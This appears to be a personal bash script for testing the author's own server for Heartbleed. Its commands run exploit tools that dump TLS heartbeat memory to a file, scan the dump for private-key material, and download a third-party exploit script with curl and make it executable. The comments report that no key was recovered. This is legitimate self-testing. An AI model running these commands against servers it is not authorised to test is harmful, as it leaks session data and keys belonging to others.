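#!/bin/bash
#
# Heartbleed self-check helpers for chubot.com.
#
# Goes in this dir.
#
# https://github.com/einaros/heartbleed-tools
#
# Install python3.
#
# Usage:
#   ./run.sh <function name> [args]
#
# The last line of the file dispatches its arguments as a command, so each
# function below is a subcommand. With no arguments nothing is run.

# Probe the host with hb.py using that tool's default settings.
is-vulnerable() {
  ./hb.py chubot.com
}

# Collect heartbeat response data from the host into a file.
#
# Arguments: $1 - output file (default: chubot.bin)
#
# NOTE: This runs forever. You have to stop it then scan.
#
# NOTE(review): the output is data returned by the server's TLS process and
# may hold key material or session data. It is written under a restrictive
# umask; treat it as a secret and delete it once the scan is finished.
dump-data() {
  local out=${1:-chubot.bin}

  # Subshell so the umask does not leak into anything run after this function.
  (
    umask 077
    # 50 threads, loop 100 times
    time ./hb.py \
      -p 443 \
      chubot.com \
      -n 0xF000 -l 100 -t 50 -d \
      -o "$out"
  )
}

readonly CERT_PATH=crt/chubot.com.crt

# meh: ran it on a 180MB dump. Didn't find anything. My server probably has a
# different config than cloudflarechallenge.
#
# Key size: 128
# Data length: 180264375
#
# Run keyscan.py over a dump file, using the server certificate as reference.
#
# Arguments: $1 - dump file to scan (default: chubot.bin)
scan() {
  local bin=${1:-chubot.bin}
  time ./keyscan.py "$CERT_PATH" "$bin"
}

# OK, this is useful at least.
#
# Print the modulus of the public key in the server certificate.
get-modulus() {
  openssl x509 -noout -in "$CERT_PATH" -modulus
}

#
# Another Python codebase
#

# Mentioned here: https://news.ycombinator.com/item?id=7577659
#
# Fetch heartbeat.py and mark it executable.
#
# The URL names one specific gist revision, so the content does not follow
# later edits to the gist. It is still third-party code: read it before
# running it.
#
# Returns: curl's exit status if the download fails; chmod is then skipped.
download() {
  local url='https://gist.githubusercontent.com/benmmurphy/12999c91a4d328b749e3/raw/9bcd402e3d9beec740a61a1585e24c36dea80859/heartbeat.py'

  # --fail: an HTTP error page must not be saved as heartbeat.py and then
  # made executable.
  curl --fail -O "$url" || return
  chmod u+x heartbeat.py
}

# Hm interesting. Is this because I built nginx myself? Weird.
#
# ... received message: type = 55, ver = beb4, length = 8496
# No heartbeat response received from chubot.com, server likely not vulnerable
heartbeat() {
  time ./heartbeat.py chubot.com "$CERT_PATH"
}

# Dispatch: run the function named on the command line with its arguments.
"$@"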